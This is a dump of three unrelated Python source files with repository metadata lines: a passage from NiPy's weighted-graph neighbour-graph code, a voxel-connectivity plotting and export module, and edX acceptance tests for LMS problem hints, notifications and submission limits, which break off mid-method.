It is assumed that the features are embedded
in a (locally) Euclidean space
for the sake of speed it is advisable to give PCA-preprocessed
matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_cross_eps(X,Y,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def cross_eps_robust(self,X,Y,eps=1.):
"""
Set the graph to be the eps-neighbours graph from X to Y
this procedure is robust in the sense that for each row of X
at least one matching row Y is found, even though the distance
is greater than eps.
Parameters
----------
X,Y: arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = dimension of the features
eps=1, float, the neighbourhood size considered
Returns
-------
self.E (int) the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidean space
for the sake of speed it is advisable to give
PCA-preprocessed matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
eps = float(eps)
except:
"eps cannot be cast to a float"
if np.isnan(eps):
raise ValueError, 'eps is nan'
if np.isinf(eps):
raise ValueError, 'eps is inf'
i,j,d = graph_cross_eps_robust(X,Y,eps)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
def cross_knn(self,X,Y,k=1):
"""
set the graph to be the k-nearest-neighbours graph from X to Y
Parameters
----------
X,Y arrays of shape (self.V) or (self.V,p)
and (self.W) or (self.W,p) respectively
where p = dimension of the features
k=1, int is the number of neighbours considered
Returns
-------
self.E, int the number of edges of the resulting graph
Note
----
It is assumed that the features are embedded in a
(locally) Euclidean space
for the sake of speed it is advisable to give
PCA-preprocessed matrices X and Y.
"""
self.check_feature_matrices(X,Y)
try:
k=int(k)
except :
"k cannot be cast to an int"
if np.isnan(k):
raise ValueError, 'k is nan'
if np.isinf(k):
raise ValueError, 'k is inf'
i,j,d = graph_cross_knn(X,Y,k)
self.E = np.size(i)
self.edges = np.zeros((self.E,2),np.int)
self.edges[:,0] = i
self.edges[:,1] = j
self.weights = np.array(d)
return self.E
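# --- illustrative sketch (editor's addition) ---------------------------------
# Brute-force equivalent of the cross_knn semantics above; the class itself
# delegates to the compiled graph_cross_knn. X and Y are assumed to be 2-D,
# of shapes (n, p) and (m, p).
def _cross_knn_reference(X, Y, k=1):
    # squared Euclidean distances, shape (n, m)
    D = ((X[:, None, :] - Y[None, :, :]) ** 2).sum(-1)
    # indices of the k nearest rows of Y for each row of X
    return np.argsort(D, axis=1)[:, :k]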
def concatenate_graphs(G1,G2):
"""
Sets G as the concatenation of the graphs G1 and G2
It is thus assumed that the vertices of G1 and G2 are disjoint sets
Parameters
----------
G1,G2: the two WeightedGraph instances to be concatenated
Returns
-------
G, WeightedGraph, the concatenated graph
Note
----
this implies that the vertices of G corresponding to G2
are labeled [G1.V .. G1.V+G2.V-1]
"""
V = G1.V+G2.V
edges = np.vstack((G1.edges,G1.V+G2.edges))
weights = np.hstack((G1.weights,G2.weights))
G = WeightedGraph(V,edges,weights)
return G
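# --- illustrative sketch (editor's addition) ---------------------------------
# Small usage example of concatenate_graphs; only pure-Python constructor code
# is exercised. G2's vertices end up renumbered as 2 and 3 in the result.
def _demo_concatenate():
    e = np.array([[0, 1], [1, 0]])
    w = np.ones(2)
    G1 = WeightedGraph(2, e, w)
    G2 = WeightedGraph(2, e, w)
    G = concatenate_graphs(G1, G2)
    return G.edges          # [[0,1],[1,0],[2,3],[3,2]]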
|
yarikoptic/NiPy-OLD
|
nipy/neurospin/graph/graph.py
|
Python
|
bsd-3-clause
| 44,792
|
[
"Gaussian"
] |
80bfb2570da31ca771363d22a28e4ab3f245e22bf28ba61f7a25ba3c540f06a6
|
import numpy as np
from IPython import embed
def coords2str(x):
return " ".join(("%d" % n for n in x))
def str2coords(s):
return np.fromstring(s, dtype=int, sep=" ")
def index_lookup_map(x):
return {coords2str(x): i for i,x in enumerate(x)}
def bounding_box(voxels):
mins=np.min(voxels,axis=0)
maxs=np.max(voxels,axis=0)
return (mins,maxs)
def centroid_of_region_2d(label_grid,region):
y,x=np.where(label_grid==region)
return (np.mean(x),np.mean(y))
def gaussian_injection(center,radius):
from scipy.ndimage.filters import gaussian_filter
n=radius*2+1
nhalf=radius
data=np.zeros([n,n,n])
data[nhalf,nhalf,nhalf]=1.0
filt=gaussian_filter(data,radius/3.0,mode='constant',cval=0.0,truncate=3.0)
filt=filt/np.sum(filt)
vox_filt={}
for index, v in np.ndenumerate(filt):
voxel=np.array(center+index-[nhalf,nhalf,nhalf],dtype=int)
key=coords2str(voxel)
vox_filt[key]=v
return vox_filt
def point_injection(center):
key=coords2str(center)
vox_filt={}
vox_filt[key]=1.0
return vox_filt
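# --- illustrative sketch (editor's addition) ---------------------------------
# Both injection kernels above distribute unit mass over voxel keys;
# gaussian_injection spreads it over a (2*radius+1)^3 cube (needs scipy),
# point_injection is the single-voxel special case.
def _demo_injection_mass():
    center = np.array([10, 10, 10])
    g = gaussian_injection(center, radius=2)
    p = point_injection(center)
    return sum(g.values()), sum(p.values())    # both sums are 1.0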
def build_injection_vectors(voxel_coords,coord_vox_map,
region_ids,inj_site_id,radius,stride):
'''
Tiles the injection site with virtual injections of a given radius.
Generates the virtual injections.
Parameters
----------
voxel_coords : ndarray (N x 3)
Coordinates x,y,z of each voxel
coord_vox_map : dict
Keys are coords2str([x,y,z]), values give index of that voxel
region_ids : ndarray (N x 1)
Regions assigned to each voxel
inj_site_id : int
Id of region to target
radius : int
Radius of each injection (units: voxels)
stride : int
How many voxels to stride when placing centers
Returns
-------
Xvirt : ndarray (N x num_inj)
Array representing the virtual injections
inj_center : ndarray (3 x num_inj)
Centers of the virtual injections
'''
index_in_source=(region_ids==inj_site_id)
min_bnd, max_bnd=bounding_box(voxel_coords[np.where(index_in_source)[0],])
N=voxel_coords.shape[0]
num_est=int(np.round(np.prod(max_bnd-min_bnd)/radius**3.0))
num=0
Xvirt=np.zeros((N,num_est))
inj_center=np.zeros((3,num_est))
# y changes slowest since it is approximately depth
for y in np.arange(min_bnd[1],max_bnd[1],stride,dtype=np.int):
for z in np.arange(min_bnd[2],max_bnd[2],stride,dtype=np.int):
for x in np.arange(min_bnd[0],max_bnd[0],stride,dtype=np.int):
this_center=np.array([x,y,z],dtype=int)
#this_inj=gaussian_injection(this_center,radius)
this_inj=point_injection(this_center)
these_vox=this_inj.keys()
keep_this=True
for v in these_vox:
try:
index=coord_vox_map[v]
if not index_in_source[index]:
keep_this=False
break
except KeyError:
keep_this=False
break
if keep_this:
for v in these_vox:
index=coord_vox_map[v]
Xvirt[index,num]=this_inj[v]
inj_center[:,num]=this_center
num+=1
Xvirt=Xvirt[:,0:num]
inj_center=inj_center[:,0:num]
return Xvirt,inj_center
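# --- illustrative sketch (editor's addition) ---------------------------------
# Toy end-to-end call of build_injection_vectors: a 4x4x4 block of voxels is
# labeled as one region and tiled with single-voxel virtual injections.
# All values below are made up for illustration.
def _demo_virtual_injections():
    coords = np.array([[x, y, z] for x in range(4)
                       for y in range(4) for z in range(4)])
    vox_map = index_lookup_map(coords)
    region_ids = np.ones(len(coords), dtype=int)   # every voxel in region 1
    Xvirt, centers = build_injection_vectors(
        coords, vox_map, region_ids, inj_site_id=1, radius=1, stride=2)
    return Xvirt.shape, centers.shape              # (64, num_inj), (3, num_inj)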
def map_to_regular_grid(x, voxel_coords, bbox=None):
'''
Map a voxel vector into a regular grid in the bounding box.
Parameters
----------
x : ndarray (N x 1 or N x 2)
voxel_coords : ndarray (N x 3)
bbox : list, default = None
Length 3 list of bounding box coords to map into
Returns
-------
Y
'''
## check input
if bbox is not None:
assert type(bbox) is list, \
"bbox should be list"
assert len(bbox) == 3, \
"bbox length should be 3"
assert voxel_coords.shape[0] == x.shape[0], \
"x and voxel_coords should have same first dimension"
assert voxel_coords.shape[1] == 3,\
"voxel_coords should be (N x 3)"
## compute bounding box if necessary
if bbox is None:
min_box, max_box = bounding_box(voxel_coords)
bbox = shape_regular_grid(voxel_coords)
else:
min_box = [0, 0, 0]
max_box = bbox
if x.ndim == 2:
# assume 2nd dim holds multiple vectors; fill each one in place rather than
# recursing (list(bbox).append(...) returned None, and recursion lost min_box)
num_virt = x.shape[1]
Y = np.zeros(list(bbox) + [num_virt])
for inj in range(num_virt):
for index, value in enumerate(x[:, inj]):
new_index = (voxel_coords[index] - min_box).astype(int)
Y[new_index[0], new_index[1], new_index[2], inj] = value
elif x.ndim == 1:
Y = np.zeros(bbox)
for index, value in enumerate(x):
new_index = (voxel_coords[index] - min_box).astype(int)
Y[new_index[0],new_index[1],new_index[2]] = value
else:
raise Exception('can only map 1 or 2 dimensional arrays to a grid')
return(Y)
def shape_regular_grid(voxel_coords):
min_box, max_box = bounding_box(voxel_coords)
dims = max_box - min_box+1
return dims
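# --- illustrative sketch (editor's addition) ---------------------------------
# Usage of map_to_regular_grid for a 1-D voxel vector: values are scattered
# into a dense grid spanning the bounding box of the coordinates.
def _demo_grid_mapping():
    coords = np.array([[5, 5, 5], [6, 5, 5], [5, 7, 5]])
    x = np.array([1.0, 2.0, 3.0])
    grid = map_to_regular_grid(x, coords)          # shape (2, 3, 1)
    return grid[0, 0, 0], grid[1, 0, 0], grid[0, 2, 0]   # 1.0, 2.0, 3.0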
def save_as_csv(fn,Xvirt_grid,Yvirt_grid,
voxel_coords_source,
voxel_coords_target):
'''
Save 4d arrays in CSV
Parameters
----------
fn : string
Filename
Xvirt_grid : ndarray
4d array of injections aligned to grid
Yvirt_grid : ndarray
4d array of projections aligned to grid
voxel_coords_source : ndarray
num_voxel x 3 array of x,y,z coordinates
voxel_coords_target : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
assert np.all(voxel_coords_source==voxel_coords_target),\
"source and target voxel coordinates should be equal"
assert Xvirt_grid.shape == Yvirt_grid.shape,\
"Xvirt_grid and Yvirt_grid should have same shape"
if Xvirt_grid.ndim == 4:
grid_shape=Xvirt_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=Xvirt_grid.shape[3]
else:
raise Exception("need 4d arrays for Xvirt_grid, Yvirt_grid")
num_cols=3+2*num_virt
csv_data=np.zeros((np.prod(Xvirt_grid[:,:,:,0].shape),num_cols))
base_pt=np.min(voxel_coords_source,axis=0)
row=0
for index in np.ndindex(grid_shape):
x,y,z=base_pt+np.array(index)
row_data=np.hstack((x,y,z,Xvirt_grid[index],Yvirt_grid[index]))
csv_data[row,:]=row_data
#print x,y,z
row+=1
header="X coord,Y coord,Z coord,"+\
','.join(["X%04d" % n for n in range(num_virt)])+','+\
','.join(["Y%04d" % n for n in range(num_virt)])
np.savetxt(fn,csv_data,delimiter=',',header=header,comments='')
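# --- illustrative sketch (editor's addition) ---------------------------------
# Minimal call of save_as_csv: two virtual injections on a 2x2x2 grid written
# to a hypothetical file name, giving 8 rows and 3 + 2*2 columns.
def _demo_save_csv():
    coords = np.array([[x, y, z] for x in range(2)
                       for y in range(2) for z in range(2)])
    X = np.random.rand(2, 2, 2, 2)   # last axis indexes the virtual injections
    Y = np.random.rand(2, 2, 2, 2)
    save_as_csv("demo_grid.csv", X, Y, coords, coords)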
def save_as_vtk(fn,X_grid,
voxel_coords):
'''
Save 4d arrays in VTK
Parameters
----------
fn : string
Filename
X_grid : ndarray
4d array of injections aligned to grid
voxel_coords : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
from tvtk.api import tvtk, write_data
if X_grid.ndim == 4:
grid_shape=X_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=X_grid.shape[3]
else:
raise Exception("need 4d arrays for X_grid")
VTK=tvtk.ImageData(spacing=(1,1,1),
origin=np.min(voxel_coords,axis=0),
dimensions=grid_shape)
VTK.point_data.scalars= np.arange(0,num_rows)
VTK.point_data.scalars.name='voxel number'
for n in range(num_virt):
a=VTK.point_data.add_array(X_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="X%04d" % n
VTK.point_data.update()
del a
write_data(VTK,fn)
def save_as_vtk_old(fn,Xvirt_grid,Yvirt_grid,
voxel_coords_source,
voxel_coords_target):
'''
Save 4d arrays in VTK
Parameters
----------
fn : string
Filename
Xvirt_grid : ndarray
4d array of injections aligned to grid
Yvirt_grid : ndarray
4d array of projections aligned to grid
voxel_coords_source : ndarray
num_voxel x 3 array of x,y,z coordinates
voxel_coords_target : ndarray
num_voxel x 3 array of x,y,z coordinates
'''
from tvtk.api import tvtk, write_data
assert np.all(voxel_coords_source==voxel_coords_target),\
"source and target voxel coordinates should be equal"
assert Xvirt_grid.shape == Yvirt_grid.shape,\
"Xvirt_grid and Yvirt_grid should have same shape"
if Xvirt_grid.ndim == 4:
grid_shape=Xvirt_grid[:,:,:,0].shape
num_rows=np.prod(grid_shape)
num_virt=Xvirt_grid.shape[3]
else:
raise Exception("need 4d arrays for Xvirt_grid, Yvirt_grid")
VTK=tvtk.ImageData(spacing=(1,1,1),
origin=np.min(voxel_coords_source,axis=0),
dimensions=grid_shape)
VTK.point_data.scalars= np.arange(0,num_rows)
VTK.point_data.scalars.name='voxel number'
#arr_num=1
for n in range(num_virt):
a=VTK.point_data.add_array(Xvirt_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="%04d_Inj_#%d" % (2*n, n)
VTK.point_data.update()
del a
#arr_num+=1
a=VTK.point_data.add_array(Yvirt_grid[:,:,:,n].ravel(order='F'))
VTK.point_data.get_array(a).name="%04d_Proj_#%d" % (2*n+1, n)
VTK.point_data.update()
del a
#arr_num+=1
write_data(VTK,fn)
|
kharris/allen-voxel-network
|
voxnet/plotting.py
|
Python
|
bsd-2-clause
| 9,519
|
[
"VTK"
] |
cf372d8f905e57317508791af8e03afe1a401fbd417208e2f498e435efe252b1
|
# -*- coding: utf-8 -*-
"""
Bok choy acceptance tests for problems in the LMS
See also old lettuce tests in lms/djangoapps/courseware/features/problems.feature
"""
from nose.plugins.attrib import attr
from textwrap import dedent
from common.test.acceptance.tests.helpers import UniqueCourseTest
from common.test.acceptance.pages.studio.auto_auth import AutoAuthPage
from common.test.acceptance.pages.lms.courseware import CoursewarePage
from common.test.acceptance.pages.lms.problem import ProblemPage
from common.test.acceptance.pages.lms.login_and_register import CombinedLoginAndRegisterPage
from common.test.acceptance.fixtures.course import CourseFixture, XBlockFixtureDesc
from common.test.acceptance.tests.helpers import EventsTestMixin
class ProblemsTest(UniqueCourseTest):
"""
Base class for tests of problems in the LMS.
"""
def setUp(self):
super(ProblemsTest, self).setUp()
self.username = "test_student_{uuid}".format(uuid=self.unique_id[0:8])
self.email = "{username}@example.com".format(username=self.username)
self.password = "keep it secret; keep it safe."
self.xqueue_grade_response = None
self.courseware_page = CoursewarePage(self.browser, self.course_id)
# Install a course with a hierarchy and problems
course_fixture = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
problem = self.get_problem()
sequential = self.get_sequential()
course_fixture.add_children(
XBlockFixtureDesc('chapter', 'Test Section').add_children(
sequential.add_children(problem)
)
).install()
# Auto-auth register for the course.
AutoAuthPage(
self.browser,
username=self.username,
email=self.email,
password=self.password,
course_id=self.course_id,
staff=True
).visit()
def get_problem(self):
""" Subclasses should override this to complete the fixture """
raise NotImplementedError()
def get_sequential(self):
""" Subclasses can override this to add a sequential with metadata """
return XBlockFixtureDesc('sequential', 'Test Subsection')
class ProblemClarificationTest(ProblemsTest):
"""
Tests the <clarification> element that can be used in problem XML.
"""
def get_problem(self):
"""
Create a problem with a <clarification>
"""
xml = dedent("""
<problem markdown="null">
<text>
<p>
Given the data in Table 7 <clarification>Table 7: "Example PV Installation Costs",
Page 171 of Roberts textbook</clarification>, compute the ROI
<clarification>Return on Investment <strong>(per year)</strong></clarification> over 20 years.
</p>
<numericalresponse answer="6.5">
<label>Enter the annual ROI</label>
<textline trailing_text="%" />
</numericalresponse>
</text>
</problem>
""")
return XBlockFixtureDesc('problem', 'TOOLTIP TEST PROBLEM', data=xml)
def test_clarification(self):
"""
Test that we can see the <clarification> tooltips.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, 'TOOLTIP TEST PROBLEM')
problem_page.click_clarification(0)
self.assertIn('"Example PV Installation Costs"', problem_page.visible_tooltip_text)
problem_page.click_clarification(1)
tooltip_text = problem_page.visible_tooltip_text
self.assertIn('Return on Investment', tooltip_text)
self.assertIn('per year', tooltip_text)
self.assertNotIn('strong', tooltip_text)
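class _ExampleNumericalProblemTest(ProblemsTest):
    """
    Editor's note: an illustrative sketch, not part of the original suite,
    showing the pattern the base class expects -- override get_problem() with
    an XBlockFixtureDesc and drive the page objects in a test method.
    """
    def get_problem(self):
        xml = dedent("""
            <problem>
                <numericalresponse answer="2">
                    <label>What is 1 + 1?</label>
                    <textline/>
                </numericalresponse>
            </problem>
        """)
        return XBlockFixtureDesc('problem', 'EXAMPLE PROBLEM', data=xml)

    def test_submit_correct_answer(self):
        self.courseware_page.visit()
        problem_page = ProblemPage(self.browser)
        problem_page.fill_answer('2')
        problem_page.click_submit()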
class ProblemHintTest(ProblemsTest, EventsTestMixin):
"""
Base test class for problem hint tests.
"""
def verify_check_hint(self, answer, answer_text, expected_events):
"""
Verify clicking Check shows the extended hint in the problem message.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_text[0], u'question text')
problem_page.fill_answer(answer)
problem_page.click_submit()
self.assertEqual(problem_page.message_text, answer_text)
# Check for corresponding tracking event
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.problem.hint.feedback_displayed'},
number_of_matches=1
)
self.assert_events_match(expected_events, actual_events)
def verify_demand_hints(self, first_hint, second_hint, expected_events):
"""
Test clicking through the demand hints and verify the events sent.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# The hint notification should not be visible on load
self.assertFalse(problem_page.is_hint_notification_visible())
        # The two Hint buttons should be enabled: one visible, one present but not visible in the DOM.
self.assertEqual([None, None], problem_page.get_hint_button_disabled_attr())
# The hint button rotates through multiple hints
problem_page.click_hint()
self.assertTrue(problem_page.is_hint_notification_visible())
self.assertEqual(problem_page.hint_text, first_hint)
# Now there are two "hint" buttons, as there is also one in the hint notification.
self.assertEqual([None, None], problem_page.get_hint_button_disabled_attr())
problem_page.click_hint()
self.assertEqual(problem_page.hint_text, second_hint)
# Now both "hint" buttons should be disabled, as there are no more hints.
self.assertEqual(['true', 'true'], problem_page.get_hint_button_disabled_attr())
# Now click on "Review" and make sure the focus goes to the correct place.
problem_page.click_review_in_notification(notification_type='hint')
problem_page.wait_for_focus_on_problem_meta()
# Check corresponding tracking events
actual_events = self.wait_for_events(
event_filter={'event_type': 'edx.problem.hint.demandhint_displayed'},
number_of_matches=2
)
self.assert_events_match(expected_events, actual_events)
def get_problem(self):
""" Subclasses should override this to complete the fixture """
raise NotImplementedError()
class ProblemNotificationTests(ProblemsTest):
"""
Tests that the notifications are visible when expected.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_notification_updates(self):
"""
        Verifies that notifications are removed and not visible when they should be hidden.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_success_notification_visible())
problem_page.click_submit()
problem_page.wait_success_notification()
self.assertEqual('Question 1: correct', problem_page.status_sr_text)
# Clicking Save should clear the submit notification
problem_page.click_save()
self.assertFalse(problem_page.is_success_notification_visible())
problem_page.wait_for_save_notification()
# Changing the answer should clear the save notification
problem_page.click_choice("choice_1")
self.assertFalse(problem_page.is_save_notification_visible())
problem_page.click_save()
problem_page.wait_for_save_notification()
# Submitting the problem again should clear the save notification
problem_page.click_submit()
problem_page.wait_incorrect_notification()
self.assertEqual('Question 1: incorrect', problem_page.status_sr_text)
self.assertFalse(problem_page.is_save_notification_visible())
class ProblemFeedbackNotificationTests(ProblemsTest):
"""
Tests that the feedback notifications are visible when expected.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_feedback_notification_hides_after_save(self):
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_0")
problem_page.click_submit()
problem_page.wait_for_feedback_message_visibility()
problem_page.click_choice("choice_1")
problem_page.click_save()
self.assertFalse(problem_page.is_feedback_message_notification_visible())
class ProblemSaveStatusUpdateTests(ProblemsTest):
"""
Tests the problem status updates correctly with an answer change and save.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 10},
grader_type='Final Exam')
def test_status_removed_after_save_before_submit(self):
"""
Scenario: User should see the status removed when saving after submitting an answer and reloading the page.
Given that I have loaded the problem page
And a choice has been selected and submitted
When I change the choice
And Save the problem
And reload the problem page
Then I should see the save notification and I should not see any indication of problem status
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
problem_page.click_choice("choice_1")
problem_page.click_submit()
problem_page.wait_incorrect_notification()
problem_page.wait_for_expected_status('label.choicegroup_incorrect', 'incorrect')
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_expected_status_visible('label.choicegroup_incorrect'))
problem_page.click_save()
problem_page.wait_for_save_notification()
# Refresh the page and the status should not be added
self.courseware_page.visit()
self.assertFalse(problem_page.is_expected_status_visible('label.choicegroup_incorrect'))
self.assertTrue(problem_page.is_save_notification_visible())
class ProblemSubmitButtonMaxAttemptsTest(ProblemsTest):
"""
Tests that the Submit button disables after the number of max attempts is reached.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 2},
grader_type='Final Exam')
def test_max_attempts(self):
"""
Verifies that the Submit button disables when the max number of attempts is reached.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Submit first answer (correct)
problem_page.click_choice("choice_2")
self.assertFalse(problem_page.is_submit_disabled())
problem_page.click_submit()
problem_page.wait_success_notification()
# Submit second and final answer (incorrect)
problem_page.click_choice("choice_1")
problem_page.click_submit()
problem_page.wait_incorrect_notification()
# Make sure that the Submit button disables.
problem_page.wait_for_submit_disabled()
class ProblemSubmitButtonPastDueTest(ProblemsTest):
"""
Tests that the Submit button is disabled if it is past the due date.
"""
def get_problem(self):
"""
Problem structure.
"""
xml = dedent("""
<problem>
<label>Which of the following countries has the largest population?</label>
<multiplechoiceresponse>
<choicegroup type="MultipleChoice">
<choice correct="false">Brazil <choicehint>timely feedback -- explain why an almost correct answer is wrong</choicehint></choice>
<choice correct="false">Germany</choice>
<choice correct="true">Indonesia</choice>
<choice correct="false">Russia</choice>
</choicegroup>
</multiplechoiceresponse>
</problem>
""")
return XBlockFixtureDesc('problem', 'TEST PROBLEM', data=xml,
metadata={'max_attempts': 2},
grader_type='Final Exam')
def get_sequential(self):
""" Subclasses can override this to add a sequential with metadata """
return XBlockFixtureDesc('sequential', 'Test Subsection', metadata={'due': "2016-10-01T00"})
def test_past_due(self):
"""
        Verifies that the Submit button is disabled when the problem is past its due date.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
# Should have Submit button disabled on original rendering.
problem_page.wait_for_submit_disabled()
# Select a choice, and make sure that the Submit button remains disabled.
problem_page.click_choice("choice_2")
problem_page.wait_for_submit_disabled()
class ProblemExtendedHintTest(ProblemHintTest, EventsTestMixin):
"""
Test that extended hint features plumb through to the page html and tracking log.
"""
def get_problem(self):
"""
Problem with extended hint features.
"""
xml = dedent("""
<problem>
<p>question text</p>
<stringresponse answer="A">
<stringequalhint answer="B">hint</stringequalhint>
<textline size="20"/>
</stringresponse>
<demandhint>
<hint>demand-hint1</hint>
<hint>demand-hint2</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'TITLE', data=xml)
def test_check_hint(self):
"""
Test clicking Check shows the extended hint in the problem message.
"""
self.verify_check_hint(
'B',
u'Answer\nIncorrect: hint',
[
{
'event':
{
'hint_label': u'Incorrect:',
'trigger_type': 'single',
'student_answer': [u'B'],
'correctness': False,
'question_type': 'stringresponse',
'hints': [{'text': 'hint'}]
}
}
]
)
def test_demand_hint(self):
"""
Test clicking hint button shows the demand hint in its div.
"""
self.verify_demand_hints(
u'Hint (1 of 2): demand-hint1',
u'Hint (1 of 2): demand-hint1\nHint (2 of 2): demand-hint2',
[
{'event': {u'hint_index': 0, u'hint_len': 2, u'hint_text': u'demand-hint1'}},
{'event': {u'hint_index': 1, u'hint_len': 2, u'hint_text': u'demand-hint2'}}
]
)
class ProblemHintWithHtmlTest(ProblemHintTest, EventsTestMixin):
"""
Tests that hints containing html get rendered properly
"""
def get_problem(self):
"""
Problem with extended hint features.
"""
xml = dedent("""
<problem>
<p>question text</p>
<stringresponse answer="A">
<stringequalhint answer="C"><a href="#">aa bb</a> cc</stringequalhint>
<textline size="20"/>
</stringresponse>
<demandhint>
<hint>aa <a href="#">bb</a> cc</hint>
<hint><a href="#">dd ee</a> ff</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'PROBLEM HTML HINT TEST', data=xml)
def test_check_hint(self):
"""
Test clicking Check shows the extended hint in the problem message.
"""
self.verify_check_hint(
'C',
u'Answer\nIncorrect: aa bb cc',
[
{
'event':
{
'hint_label': u'Incorrect:',
'trigger_type': 'single',
'student_answer': [u'C'],
'correctness': False,
'question_type': 'stringresponse',
'hints': [{'text': '<a href="#">aa bb</a> cc'}]
}
}
]
)
def test_demand_hint(self):
"""
Test clicking hint button shows the demand hints in a notification area.
"""
self.verify_demand_hints(
u'Hint (1 of 2): aa bb cc',
u'Hint (1 of 2): aa bb cc\nHint (2 of 2): dd ee ff',
[
{'event': {u'hint_index': 0, u'hint_len': 2, u'hint_text': u'aa <a href="#">bb</a> cc'}},
{'event': {u'hint_index': 1, u'hint_len': 2, u'hint_text': u'<a href="#">dd ee</a> ff'}}
]
)
class ProblemWithMathjax(ProblemsTest):
"""
    Tests the MathJax used in a problem.
"""
def get_problem(self):
"""
        Create a problem with MathJax in the body and hints.
"""
xml = dedent(r"""
<problem>
<p>Check mathjax has rendered [mathjax]E=mc^2[/mathjax]</p>
<multiplechoiceresponse>
<label>Answer this?</label>
<choicegroup type="MultipleChoice">
<choice correct="true">Choice1 <choicehint>Correct choice message</choicehint></choice>
<choice correct="false">Choice2<choicehint>Wrong choice message</choicehint></choice>
</choicegroup>
</multiplechoiceresponse>
<demandhint>
<hint>mathjax should work1 \(E=mc^2\) </hint>
<hint>mathjax should work2 [mathjax]E=mc^2[/mathjax]</hint>
</demandhint>
</problem>
""")
return XBlockFixtureDesc('problem', 'MATHJAX TEST PROBLEM', data=xml)
def test_mathjax_in_hint(self):
"""
        Test that MathJax has rendered successfully in the problem hints.
"""
self.courseware_page.visit()
problem_page = ProblemPage(self.browser)
self.assertEqual(problem_page.problem_name, "MATHJAX TEST PROBLEM")
problem_page.verify_mathjax_rendered_in_problem()
# The hint button rotates through multiple hints
problem_page.click_hint()
self.assertEqual(
["<strong>Hint (1 of 2): </strong>mathjax should work1"],
problem_page.extract_hint_text_from_html
)
problem_page.verify_mathjax_rendered_in_hint()
# Rotate the hint and check the problem hint
problem_page.click_hint()
self.assertEqual(
[
"<strong>Hint (1 of 2): </strong>mathjax should work1",
"<strong>Hint (2 of 2): </strong>mathjax should work2"
],
problem_page.extract_hint_text_from_html
)
problem_page.verify_mathjax_rendered_in_hint()
class ProblemPartialCredit(ProblemsTest):
"""
Makes sure that the partial credit is appearing properly.
"""
def get_problem(self):
"""
Create a problem with partial credit.
"""
xml = dedent("""
<problem>
<p>The answer is 1. Partial credit for -1.</p>
<numericalresponse answer="1" partial_credit="list">
<label>How many miles away from Earth is the sun? Use scientific notation to answer.</label>
<formulaequationinput/>
<responseparam type="tolerance" default="0.01" />
<responseparam partial_answers="-1" />
</numericalresponse>
</problem>
""")
